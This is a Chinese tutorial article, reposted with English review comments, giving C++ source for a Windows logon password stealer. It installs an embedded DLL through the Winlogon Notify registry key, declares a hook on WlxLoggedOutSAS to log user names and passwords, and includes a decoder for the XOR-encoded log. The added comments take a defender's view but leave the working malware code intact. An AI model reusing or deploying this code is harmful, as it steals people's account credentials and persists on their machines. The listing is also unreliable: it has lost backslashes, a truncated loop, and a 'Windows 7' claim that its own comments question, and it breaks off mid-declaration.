
基于VC++2010实现截获Windows 7密码(一)
2014-11-23 21:30:28 】 浏览:1197
Tags:基于 2010 实现 截获 Windows 密码

Windows外壳,安装Windows密码截获器

/*
 * Decoder half of the tool ("getpwd.exe Decryp"): reads up to 10000 bytes from
 * pwd.txt in the directory returned by GetSystemDirectory(), XORs buffer bytes
 * with the constant 3 and prints the result.
 *
 * Defender view: a single-byte XOR with a fixed key is encoding, not encryption.
 * Anyone who can read the file recovers its contents, so a pwd.txt found in the
 * system directory should be handled as exposed credentials during response.
 *
 * NOTE(review): the listing shows "/r/n" and "//" where "\r\n" and "\\" would be
 * expected; the backslashes were presumably lost when the article was published.
 */
void dey()//decode
{
printf("/r/n请不要移动原密码文件!");
system("pause");
char buffer[10000];
ZeroMemory(buffer,10000);
// NOTE(review): LogPath holds 255 bytes but MAX_PATH (260) is passed as its size,
// and lstrcat appends without a bound.
char LogPath[255] = {0};
GetSystemDirectory( LogPath , MAX_PATH);
lstrcat( LogPath, "//pwd.txt");
// OPEN_ALWAYS asks CreateFile to create the file when it does not exist, so the
// decoder can leave an empty pwd.txt behind on a machine that never had one.
HANDLE hfile = CreateFile(
LogPath,
GENERIC_READ,
FILE_SHARE_WRITE,
0,
OPEN_ALWAYS,
FILE_ATTRIBUTE_NORMAL,
0);
// NOTE(review): CreateFile reports failure with INVALID_HANDLE_VALUE, not 0, so
// this branch does not catch a failed open.
if(!hfile)
{
printf("打开文件失败!");
return;
}
// st receives the number of bytes ReadFile stored in buffer.
DWORD st;
int a=ReadFile(hfile,buffer,10000,&st,0);
if(!a)
{
printf("读取失败!");
// hfile is not closed on this path, nor on the normal return below.
return;
}
// NOTE(review): the loop header below is truncated in this listing; it presumably
// ran i from 0 up to the byte count in st - confirm against the original article.
for(int i = 0;i {
// XOR with 3 is its own inverse; presumably the writer side applied the same
// XOR before storing the data (that code is not shown here).
buffer[i]=buffer[i]^3;
}
// %s relies on a terminating NUL; a read that fills all 10000 bytes leaves none.
printf("解密内容为:/r/n%s",buffer);
return;
}
bool installed(); //forward declaration: reports whether the package is already registered
/*
 * Installer path of the tool ("getpwd.exe installe"). As written it:
 *   1. returns early when installed() reports an existing registration;
 *   2. copies the embedded resource IDR_DLL1 (type "dll") into a heap buffer;
 *   3. writes that buffer to GetPwd.dll under the directory returned by
 *      GetWindowsDirectory();
 *   4. creates the Winlogon Notify subkey "GetPwd" under HKEY_LOCAL_MACHINE and
 *      sets its "dllname" and "startup" values.
 *
 * Defender view: both writes (a DLL in the Windows directory, a key under HKLM)
 * normally require administrative rights, and both leave durable artefacts.
 * Registry auditing or Sysmon registry events on the Winlogon Notify key, plus
 * file-creation monitoring on the Windows directory, cover this pattern
 * (MITRE ATT&CK T1547.004, Winlogon Helper DLL).
 *
 * NOTE(review): Microsoft documents Winlogon notification packages as no longer
 * supported from Windows Vista onward, which sits oddly with the "Windows 7" in
 * the article title - confirm against the remaining pages of the article.
 * NOTE(review): "//" in the string literals below is presumably "\\" with the
 * backslashes lost in publishing; as printed, the separators are forward slashes.
 */
void installe() //install routine
{
if(installed())
{
printf("已经安装过了!");
return;
}
HRSRC hResInfo;
HGLOBAL hResData;
DWORD dwSize, dwWritten;
LPBYTE p;
HANDLE hFile;
// The DLL travels inside the executable as a resource, so the installer is a
// single file; the DLL only appears on disk after the WriteFile below.
hResInfo = FindResource(NULL, MAKEINTRESOURCE(IDR_DLL1), "dll");
dwSize = SizeofResource(NULL, hResInfo);
hResData = LoadResource(NULL, hResInfo);
p = (LPBYTE)GlobalAlloc(GPTR, dwSize);
CopyMemory((LPVOID)p, (LPCVOID)LockResource(hResData), dwSize);//locate and copy the resource
char pfile[200];
GetWindowsDirectory(pfile, 200);
strcat(pfile,"//GetPwd.dll");//C:/WINDOWS/
// CREATE_ALWAYS overwrites any existing file of the same name.
hFile = CreateFile(pfile, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL);
WriteFile(hFile, (LPCVOID)p,dwSize, &dwWritten, NULL);
CloseHandle(hFile);
GlobalFree((HGLOBAL)p);
HKEY hkey;
// Registration step: the subkey name and the two values are the persistent
// registry artefacts of this installer.
if(ERROR_SUCCESS==RegCreateKey(HKEY_LOCAL_MACHINE,
"SOFTWARE//Microsoft//Windows NT//CurrentVersion//Winlogon//Notify//GetPwd//",
&hkey)
)
{
char * name3 ="dog";
// "dllname" is set to the path of the DLL written above.
RegSetValueEx(hkey,"dllname",0,REG_SZ,(const unsigned char *)pfile,strlen(pfile));
// "startup" is set to "dog"; under the notification-package convention this
// presumably names the DLL export Winlogon calls at system startup - TODO confirm.
RegSetValueEx(hkey,"startup",0,REG_SZ,(const unsigned char *)name3,strlen("dog"));
printf("安装成功!");
}
else
{
printf("安装失败!");
return;
}
}
/*
 * Reports whether the Winlogon Notify subkey "GetPwd" can be opened under
 * HKEY_LOCAL_MACHINE: returns true when RegOpenKeyEx succeeds, false otherwise.
 * Only the key is probed; the DLL file on disk is not checked.
 *
 * Defender view: the presence of this subkey is the same indicator a responder
 * can query for when triaging a host.
 *
 * NOTE(review): any failure, including access denied from the KEY_ALL_ACCESS
 * request, is reported as "not installed".
 * NOTE(review): "//" in the key path is presumably "\\" lost in publishing.
 */
bool installed()
{
HKEY hkey;
// sz, dwtype and sl are declared but never used in this function.
char sz[256];
DWORD dwtype, sl = 256;
if(ERROR_SUCCESS != RegOpenKeyEx(HKEY_LOCAL_MACHINE,
"SOFTWARE//Microsoft//Windows NT//CurrentVersion//Winlogon//Notify//GetPwd",
NULL, KEY_ALL_ACCESS, &hkey) //open failed: treated as not installed
)
{
// NOTE(review): hkey was never initialised and the open failed, so this call
// passes an indeterminate handle to RegCloseKey.
RegCloseKey(hkey);
return false;
}
RegCloseKey(hkey);
return true;
}
/*
 * Print the command-line help for the two sub-commands the program accepts.
 * The text is emitted exactly as it appears in the listing; "/r/n" is therefore
 * printed literally (presumably "\r\n" before the backslashes were lost).
 */
void usag()
{
    static const char *const help[] = {
        "example:/r/n",
        "/r/n Install: getpwd.exe installe",
        "/r/n Decryp : getpwd.exe Decryp /r/n",
    };
    const unsigned count = sizeof help / sizeof help[0];

    /* None of the strings contains a '%', so passing them through "%s"
       produces the same output as using them as the format string. */
    for (unsigned k = 0; k < count; ++k) {
        printf("%s", help[k]);
    }
}
/*
 * Entry point: dispatches on the first command-line argument, compared
 * case-insensitively. "installe" runs installe(), "Decryp" runs dey(), and
 * anything else prints the usage text. The exit status is always 0.
 *
 * NOTE(review): argv[1] is read without consulting argc, so a run with no
 * arguments passes a null pointer to lstrcmpi.
 */
int main(int argc, char* argv[])
{
    const char *verb = argv[1];

    if (lstrcmpi(verb, "installe") == 0) {
        installe();
    } else if (lstrcmpi(verb, "Decryp") == 0) {
        dey();
    } else {
        usag();
    }
    return 0;
}
密码截获
/*
 * Declarations for the DLL side of the article. They re-declare, locally, the
 * GINA types involved in the WlxLoggedOutSAS call and name the helpers that the
 * following pages of the article presumably define (none is defined here).
 *
 * Defender view: WLX_MPR_NOTIFY_INFO carries the password as a wide-character
 * string (pszPassword), which is why code running inside the logon process at
 * this call site is so sensitive. Restricting who can register logon-time DLLs
 * and monitoring modules loaded into Winlogon are the relevant controls.
 * NOTE(review): GINA and its WlxLoggedOutSAS callback were replaced by
 * credential providers in Windows Vista and later - confirm how this relates
 * to the "Windows 7" claim in the title.
 */
// Return value of WlxLoggedOutSAS that signals a successful logon
// (presumably mirrors the winwlx.h constant - TODO confirm).
#define WLX_SAS_ACTION_LOGON (1)
DWORD WINAPI StartHook(LPVOID lpParameter);
// Local copy of the structure through which logon data is passed along.
typedef struct _WLX_MPR_NOTIFY_INFO {
PWSTR pszUserName;
PWSTR pszDomain;
PWSTR pszPassword;
PWSTR pszOldPassword;
} WLX_MPR_NOTIFY_INFO, * PWLX_MPR_NOTIFY_INFO;
typedef int (WINAPI* WlxLoggedOutSAS)(
//function-pointer type, so the call can be forwarded to the system implementation
PVOID pWlxContext,
DWORD dwSasType,
PLUID pAuthenticationId,
// NOTE(review): "PSIDpLogonSid" looks like "PSID pLogonSid" with the space lost
// in publishing (compare FunNewADDR below).
PSIDpLogonSid,
PDWORD pdwOptions,
PHANDLE phToken,
// NOTE(review): likewise presumably "PWLX_MPR_NOTIFY_INFO pNprNotifyInfo".
PWLX_MPR_NOTIFY_INFOpNprNotifyInfo,
PVOID * pProfile
);
int WINAPI FunNewADDR(
PVOID pWlxContext,
DWORD dwSasType,
PLUID pAuthenticationId,
PSID pLogonSid,
PDWORD pdwOptions,
PHANDLE phToken,
PWLX_MPR_NOTIFY_INFO prNotifyInfo,
PVOID * pProfile);
//replacement function that takes over WlxLoggedOutSAS; parameter list kept identical
void WriteLog(
// NOTE(review): type and parameter name are run together here as well.
PWLX_MPR_NOTIFY_INFOpNprNotifyInfo
);//prototype of the function that saves the user name and password
int WideToByte( PCHAR sz_target, PWSTR sz_source , int size_ansi);
void WriteCurrentTime();
void HookWlxLoggedOutSAS();
//installs the hook
void UnHookWlxLoggedOutSAS();
//removes the hook
bo
